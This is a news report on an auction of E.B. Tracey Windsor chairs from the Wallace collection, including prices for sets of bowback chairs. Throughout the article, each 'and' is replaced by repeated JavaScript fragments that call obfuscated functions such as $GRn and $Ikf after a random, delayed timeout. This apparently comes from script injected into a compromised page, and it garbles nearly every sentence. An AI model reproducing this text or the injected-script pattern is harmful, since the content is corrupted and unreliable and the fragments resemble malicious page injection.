WINDSOR, CONN. — “All of the Tracey Windsor chairs came from the Elizabeth andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Edward Wallace Collection. They owned the Tracey house that was dismantled in Lisbon andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and they had it reconstructed in Meriden about 30 years ago,” stated auctioneer Ed Nadeau prior to the gallery’s American Auction on October 25. “This is probably the largest offering of Tracey’s chairs at a single auction,” stated the auctioneer.
Eighteen examples were offered in the auction. And while in years past a signed E.B. Tracey chair would elicit a large crowd of bidders andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and strong prices, many of the chairs went out at extremely reasonable prices. Such was the case with two assembled sets of five marked bowbacks bringing $876 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and $1,250. Yes, those are prices for the sets of five chairs — equating to $172 each for the first group andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and $250 each for the second. These sort of prices caused more than one person attending the auction to wonder when the millennium buyers are going to wake up andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and realize the beauty andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and value of these prime furnishings. “There used to be a time when Tracey chairs would sell individually for what we have the entire sets estimated for,” said the auctioneer with a grimace.
